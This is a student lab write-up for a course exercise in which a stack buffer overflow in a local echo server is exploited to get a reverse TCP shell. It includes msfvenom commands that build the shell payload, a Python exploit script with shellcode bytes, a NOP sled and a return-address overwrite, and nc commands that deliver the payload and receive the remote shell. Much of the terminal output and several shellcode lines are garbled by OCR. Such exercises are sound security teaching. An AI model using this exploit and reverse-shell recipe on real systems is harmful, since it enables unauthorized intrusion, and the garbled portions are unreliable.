# TCP-Reverse-Shell

Class	CSE544
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<b>≡</b> Туре	Exercise 3
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## Step 1: Generating shellcode binary using msfvenom

- 1. Find suitable payload using msfvenom -l payloads | grep linux | grep reverse\_tcp .

  Here I am using linux 64 bit machine and I want shellcode for victim shell access using tcp connection. So my suitable payload would be linux/x64/shell\_reverse\_tcp
- 2. This command below creates shellcode in elf format and saves in a file called shell.-b option allows to remove null characters, tabs and newspace etc.

```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<AttackerIP Address> LPORT=<Attacker Port to Connect On> -f elf -o shell -b "\x00\x0a\x0d\x20"
```

```
Lartix Stack-Buffer-Overflow1# msfvenom -p linux/x64/shell_reverse_tcp lhost=172.16.12.130 lport=444 -f elf -o shell -b "\x00\x0
a\x00\x20"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 4 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=17, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 119 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes
Final size of elf file: 239 bytes
Saued as: shell
```

#### Testing its working

Running standlone shellcode and gaining acces. Give permissions to be executable chmod a+x shell

- 1. run ./shell on victim machine
- 2. run nc -lvp 444 on attacker machine

If everything works fine output is as shown below , u can check victim shell folder contents using ls

Running on artix and Ubuntu as attacker machines

We could see , artix we cant have two terminals at once, so for better visualisation , shifted to Ubuntu as attacking machine but same can be replicated in artix if GUI is enabled

### Step 2: Generating payload to inject

1. This command below creates shellcode in the language you want(here is python) saves in a file called run\_shellcode.py.

```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<AttackerIP Address> LPORT=<Attacker Port to Connect On> -f python -o run_shellcode.py -b "\x00\x0a\x0d\x20"
```

- 2. Finding Buffer size, use gdb ./simple\_echo\_server
  - a. disass main : to know function calls , I found start\_user\_thread has buffer allocation and read syscall.
  - b. break \*start\_user\_thread: function where buffer is stored

```
(gdb) break start_user_thread
Breakpoint 1 at 0x55555555552b0: file simple_echo_server.c, line 56.
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Stack-buffer-Overflow/simple_echo_server
[Thread debugging using libthread_db enabled]
Jsing host libthread_db library "/usr/lib/libthread_db.so.1".
`[[A^Z
Program received signal SIGTSTP, Stopped (user).
     07fffff7ebcef7 in accept () from /usr/lib/libc.so.6
(gdb) disass start_user_thread
 Dump of assembler code for function start_user_thread:
                                push
                                      zrbp
                                MOV
                                       %rsp,%rbp
                                       $0x410,%rsp
                                sub
                                MOV
                                       \timesedi,-0x404(\timesrbp)
                                       -0x400(2rbp),2rax
                                lea
                                       $0x400,%edx
                                MOV
                                       $0x0,%esi
                                MOV
                                MOV
                                       /rax,/rdi
                                                   070 <memset@plt>
                                call
                                       -0x400(%rbp),%rcx
                                lea
                                       -0x404(%rbp),%eax
                                MOV
                                       $0x1000,%edx
                                MOV
                                MOV
                                       //rcx,/rsi
                                MOV
                                       zeax,zedi,
                                                   080 (read@plt)
                                call
                                       -0x400(%rbp),%rax
                                lea
                                MOV
                                       //rax,/rsi
                                       0xd0e(%rip),%rax
                                                               # 0x55555556004
                                lea
                                MOV
                                       zrax,zrdi,
                                       $0x0,%eax
                                MOV
                                                   060 <printf@plt>
                                call
                                       -0x400(%rbp),%rax
                                lea
                                MOV
                                       /rax,/rdi
                                call
                                                  5040 <strlen@plt>
                                       0x1(zrax),zrdx
                                lea
                                       -0x400(%rbp),%rcx
                                lea
                                       -0x404(%rbp),%eax
                                MOV
                                MOV
                                       //rcx,//rsi
                                MOV
                                       zeax,zedi
  0x0000555555555328 <+137>:
                                call
                                      0x555555555030 
  0x000055555555532d <+142>:
                                nop
  0x0000055555555532e <+143>:
0x0000555555555532f <+144>:
                                leave
                     <+144>:
                                ret
End of assembler dump.
(gdb) _
```

Here we can see 0x400 set aside for buffer.

c. Other method to find buffer size

```
p/d <rbp_address> - <rsp_address> : gives buffersize+16(as each rsp,rbp takes 8 bytes each)
Find rsp and rbp using ir
```

```
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./simple_echo_server...
(gdb) break st
start_user_thread stdint-uintn.h
                                       string.h
                                                          strlen@plt
stddef.h
                   stdio.h
                                       strlen
(gdb) break st
start_user_thread stdint-uintn.h
                                                          strlen@plt
                                       string.h
                   stdio.h
                                       strlen
stddef.h
(gdb) break start_user_thread
Breakpoint 1 at 0x12b0: file simple_echo_server.c, line 56.
(gdb) run
Starting program: /root/Stack-buffer-Overflow/simple_echo_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Breakpoint 1, start_user_thread (sockfd=4) at simple_echo_server.c:56
        simple_echo_server.c: No such file or directory.
(gdb) i r
               0x4
                                    4
rax
                                   0
rbx
               0x0
               0x7fffff7ebcef7
                                    140737352814327
rcx
rdx
                                    140737488349824
               0x7ffffffffea80
                                   0
rsi
               0x0
               0x4
rdi
                                    4
                                   0x7ffffffffe260
rbp
               0x7fffffffe260
               0x7fffffffde50
                                   0x7fffffffde50
rsp
               0x7fffffffa5a10
r8
                                    140737353767440
r9
                                    140737353923200
               0x7fffff7fcba80
r10
                                    140737351749096
               0x7fffff7db8de8
r11
               0x7fffff7f2fc40
                                    140737353284672
r12
                                    140737488350136
               0x7ffffffffebb8
r13
               0x555555551c9
                                   93824992235977
                                   93824992247280
r14
               0x55555557df0
r15
               0x7fffffffd000
                                    140737354125312
                                   0x5555555552b0 <start_user_thread+17>
               0x555555552b0
rip
                                    [ PF IF ]
eflags
               0x206
               0x33
                                   51
CS
               0x2b
                                    43
22
ds
               0x0
                                   0
es
               0x0
                                   0
fs
               0x0
                                   0
               0x0
                                    0
gs
(gdb) _
```

### Step 3: Injecting the payload

- 1. Things to note for this victim program:
  - a. start\_user\_thread uses call instruction not jump (push return address and return
     value)
  - b. stack grows downwards (higher address up and lower address below),
  - c. Our buffer grows upwards.
- 2. Since we got the buffer size , find the length of the shellcode to add padding and rip address to overflow the buffer.

```
import struct
buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\xb6\x5c\xa1\xcd\x28\x8f\x64"
buf += b"\\x58\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4"
buf += b"\xdc\x75\xf9\x54\x42\x8d\x3b\xd0\xb7\x02\xae\xc8\x60"
buf += b"\x18\x2c\x03\xb4\x5c\xb0\x91\x84\x9f\x68\xbb\xe7\x14"
buf += b"\\x28\\x2b\\x42\\x9f\\x3e\\xd0\\x9c\\x04\\xae\\xc8\\x42\\x8c\\x3a"
buf += b"\xf2\x49\x92\xcb\xec\x70\x80\x61\xcf\x40\x36\x9a\x95"
buf += b"\xb1\xc7\xdf\x95\xd4\x35\xcf\xe2\x5b\xe7\x64\xe9\xfe"
buf += b"\xd5\x46\x9f\x7f\xc7\xed\x5c\xb9\x59\xa1\xcd\x28\x8f"
buf += b" \times 64 \times ba'
# tbuf = "\xcc"*119
# print len(buf)
RIP = struct.pack("Q", 0x7ffffffffe260-0x200)
padding = "\x90" * 813
nops= "\x90" * 100
payload= padding + buf + nops + RIP
print payload
```

```
RIP = struct.pack("Q", 0x7fffffffe260-0x200)
payload= padding + buf + nops + RIP
```

- Major work is done by these two lines of code. Firstly payload, it fills buffer till the edge of returning(so padding ,nops and shellcode sum is 1032).
- Then next instruction(i.e RIP in our code) replaces return address with the address we want to point it. RIP has \$rbp value with approximately the size of buffer subtracted.
- The RIP which we have overwrriten basically points to a location down in the buffer. Since out buffer grows upwards we need it to point somewhere in between the buffer so that after few NOPs it reaches our shellcode.

### **Expected Results**

Without gdb run these commands on attacker machine

• nc <Victim IP address> <Victim Port Number> < <input string file>

```
ashta@gigster:-/Stack-Buffer-OverflowS nc 172.16.12.131 22000 < input2

ashta@gigster:-/Stack-Buffer-OverflowS ./simple_echo_server

artix Stack-buffer-OverflowS ./simple_echo_s
```

• nc -l -v <Attacker IP address> <Attacker Port Number>

```
ashita@digster:-/Stack-Buffer-Overflow; nc -l -v 172.16.12.1 4444

Listening on gigster 4444

Connection received on 172.16.12.131 60464

pod

/root/Stack-buffer-Overflow

whomat

ip a

il o: <loOPBACK_UP_LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000

link/loopback 60:00:00:00:00:00:00:00:00

intel 127.00.1/8 scope host to

valid_lft forever preferred_lft forever

intel:://128 scope host

valid_lft forever preferred_lft.CUP_LOWER_UP> mtu 1500 qdisc fq_codel state UP group default ql

en 1000

link/Pether 00:00:129:90:00:88 for ff:ff:ff:ff:ff:

intel 172.16.12.235/26 scope global eth0

valid_lft forever preferred_lft forever

intel 172.16.12.235 scope global eth0

valid_lft forever preferred_lft forever

intel fe80::20c:29ff:fe90:e8f/64 scope link

valid_lft forever preferred_lft forever

lostname

artix
```

With gdb

```
er:-$ cd Stack-Buffer-Overflow/
er:-/Stack-Buffer-Overflow$ nc -l -v 172.16.12.1 4444
                                                                                                                                                                                                                                                                                                                                        <http://www.gnu.org/software/gdb/documentation/>
         a

Lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000

link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00

inet 127.0.0.1/8 scope host lo

valid_lft forever preferred_lft forever

inet6 ::1/128 scope host

valid_lft forever preferred_lft forever

inet6 ::1/128 scope host

valid_lft forever preferred_lft forever

eth0: <BROADCAST,MULTICAST,DYNAMIC,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default ql
                                                                                                                                                                                                                                                                                                                                or help, type "help".

(ype "apropos word" to search for commands related to "word"...

(eading symbols from ./simple_echo_server...

(gdb) break start_user_thread

(reakpoint 1 at 0x12b0; file simple_echo_server.c, line 56.
                                                                                                                                                                                                                                                                                                                                  jdb) run
carting program: /root/Stack-buffer-Overflow/simple_echo_server
fhread debugging using libthread_db enabled]
sing host libthread_db library "/usr/lib/libthread_db.so.1".
        1000
link/ether 00:0c:29:90:0e:8f brd ff:ff:ff:ff:ff:ff
inet 172.16.12.131/24 brd 172.16.12.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe90:e8f/64 scope link
valid_lft forever preferred_lft forever
                                                                                                                                                                                                                                                                                                                                 reakpoint 1, start_user_thread (sockfd=4) at simple_echo_server.c:56
6     simple_echo_server.c: Mo such file or directory.
                                                                                                               low$ nc -l -v 172.16.12.1 4444
Listening on gigster 4444
Connection received on 172.16.12.131 60462
     nnection received on 172.16.12.131 60462

a
lo: <LOOPBACK,UP,LOMER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00 brd 00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
eth0: <BROADCAST,MULTICAST,DYNAMIC,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default ql
                                                                                                                                                                                                                                                                                                                                                                                                                                                             52b0 <start user thread+17>
          link/ether 00:0c:29:90:0e:8f brd ff:ff:ff:ff:ff
         inet 172.16.12.131/24 brd 172.16.12.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe90:e8f/64 scope link
valid_lft forever preferred_lft forever
                                                                                                                                                                                                                                                                                                                             gdb) c
Godbinuing.
process 1163 is executing new program: /usr/bin/bash
process 1163 is executing new program: /usr/bin/bash
Error in re-setting breakpoint 1: Function "start_user_thread" not defined.
[Thread debugging using libthread_db enabled]
Jsing host libthread_db library "usr/lib/libthread_db.so.1".
[Detaching after fork from child process 1167]
[Detaching after fork from child process 1168]
asd.py
input
     .
n_shellcode.py
n_shellcode2.py
```

#### Resources:

https://infosecwriteups.com/expdev-reverse-tcp-shell-227e94d1d6ee

https://medium.com/@PenTest\_duck/offensive-msfvenom-from-generating-shellcode-tocreating-trojans-4be10179bb86

https://johndcyber.com/how-to-create-a-reverse-tcp-shell-windows-executable-usingmetasploit-56d049007047

https://samsclass.info/127/proj/p4-lbuf-shell.htm

https://zerosum0x0.blogspot.com/2014/12/after-i-finished-micro-optimizing-my.html

https://resources.infosecinstitute.com/topic/stack-based-buffer-overflow-in-win-32platform-part-5-writing-reverse-tcp-exploit/

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit#step-2-copy-the-executable-payload-to-box-b